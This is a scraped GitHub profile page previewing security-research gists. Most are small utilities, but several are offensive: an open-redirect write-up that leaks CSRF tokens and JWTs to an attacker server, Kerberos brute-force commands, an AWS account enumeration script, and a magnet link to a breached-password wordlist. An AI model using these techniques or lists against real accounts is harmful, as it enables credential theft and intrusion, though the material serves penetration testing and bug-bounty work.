Skip to content

Instantly share code, notes, and snippets.

View Taius's full-sized avatar

Matthew Linney Taius

47 followers · 70 following
  • United Kingdom
View GitHub Profile
@Splint3r7
Splint3r7 / href-urls.sh
Created June 13, 2019 16:04
#!/bin/bash
echo "<title>Generated hyper Link URLS</title>" >> $1-urls.html
cat $1 | while read urls; do
echo "<a href=${urls}>${urls}</a></br></br>" >> $1-urls.html
done
@liamosaur
liamosaur / foxyproxy.json
Created June 3, 2019 05:16
{
"mode": "patterns",
"proxySettings": [
{
"address": "127.0.0.1",
"port": 8080,
"username": "",
"password": "",
"type": 1,
"title": "127.0.0.1:8080",
@hakluke
hakluke / openinbrowser.py
Created May 18, 2019 15:38
Little Python script to open a list of URLs from a file in browser tabs, n tabs at a time
#! /usr/bin/python3
import webbrowser, sys
if len(sys.argv) < 3:
print("Usage: openinbrowser.py ./urls.txt 20")
quit()
f = open(sys.argv[1])
tabs = int(sys.argv[2])
counter = 1
@hakluke
hakluke / grepips.py
Last active April 3, 2022 16:59
Little Python script to dump IP addresses from a file
#!/usr/bin/python3
import sys, re
f = open(sys.argv[1],'r')
text = f.read()
ips = []
regex = re.findall(r'\b(?:\d{1,3}\.){3}\d{1,3}\b',text)
if regex is not None:
for match in regex:
if match not in ips:
@stefanocoding
stefanocoding / csrf_jwt_redirect_leak.md
Created May 15, 2019 23:46

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.

CSRF token bug

  1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
  2. User loads https://example.com/?code=VALUE
  3. Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user 
    GET /verify/VALUE HTTP/1.1
Host: example.com
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@haccer
haccer / ggroup.py
Last active July 23, 2020 22:36
#!/usr/bin/env python3
# Google Groups v1
# python3 ggroup.py domains.txt
import requests
import re
import sys
with open(sys.argv[1]) as f:
sites = f.read().splitlines()
@flerpadoo
flerpadoo / awsEmailCheck.py
Last active July 23, 2020 22:36
Determines if there is an AWS account associated with a given email address
import re
import sys
import subprocess
from time import sleep # Can be optimized / replaced
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
def bruteAmazonEmailLogin(userEmail):
options = Options()
options.add_argument("--headless")
@OffXec
OffXec / pentest.sh
Last active August 31, 2022 13:25
Installs pentesting tools, then symlinks them to be ran seamlessly.
#/bin/bash
git clone https://github.com/danielmiessler/SecLists.git /opt/seclists
git clone https://github.com/s0md3v/XSStrike.git /opt/xsstrike
sudo ln -s /opt/xsstrike/xsstrike.py /usr/local/bin/xsstrike
chmod +x /opt/xsstrike/xsstrike.py
git clone https://github.com/s0md3v/Arjun.git /opt/arjun
sudo ln -s /opt/arjun/arjun.py /usr/local/bin/arjun
@rvrsh3ll
rvrsh3ll / Combined_HaveIBeenPwnedWordlist
Last active November 23, 2023 00:25
magnet:?xt=urn:btih:827FBFFA925AF95BA20C7C0BA8D35807C1E31C75&dn=Combined_HaveIBeenPwnedWordlists.txt&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80%2fannounce&tr=udp%3a%2f%2ftracker.opentrackr.org%3a1337%2fannounce